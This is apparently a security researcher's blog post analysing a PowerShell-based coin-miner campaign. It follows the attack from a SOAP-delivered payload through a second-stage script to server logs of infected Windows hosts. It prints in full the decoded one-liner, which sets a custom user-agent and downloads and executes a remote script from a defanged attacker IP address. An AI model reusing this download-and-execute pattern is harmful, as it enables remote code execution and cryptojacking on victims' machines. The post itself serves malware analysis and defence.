For awhile these attacks contained code that pointed to a webserver was down. Seems they changed servers and everything is up and running again.
The POST shows the PowerShell script inside of the soap envelope.
Extracting then base64-decoding the script reveals the following:
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers[‘User-Agent’]=”PowerShell/WL $OS”;IEX $WC.DownloadString(‘hxxp://101[.]200[.]45[.]78/images/test/DL.php’);
If you try to access this URL with a browser, your IP address will be blacklisted. That’s because the script above sets the headers with a specific user-agent. After you set the user-agent correctly, you will get the following:
The download is another PowerShell script. You need to deflate this after base64-decoding. You then get this rather long script.
In this snippet, the code tries to get around security software.
Here are the URLs that downloads the coin miner.
Now let’s have a look at the logs from the server. This one shows the blacklisted IP addresses.
This log file is more interesting as it shows successes and failures from many IPs. “Infected” devices include Windows 7, Server 2008, Server 2012, and Server 2016.
If this log is really accurate then it’s a scary representation of a large number of vulnerable (and now infected) devices mining coins for the crims.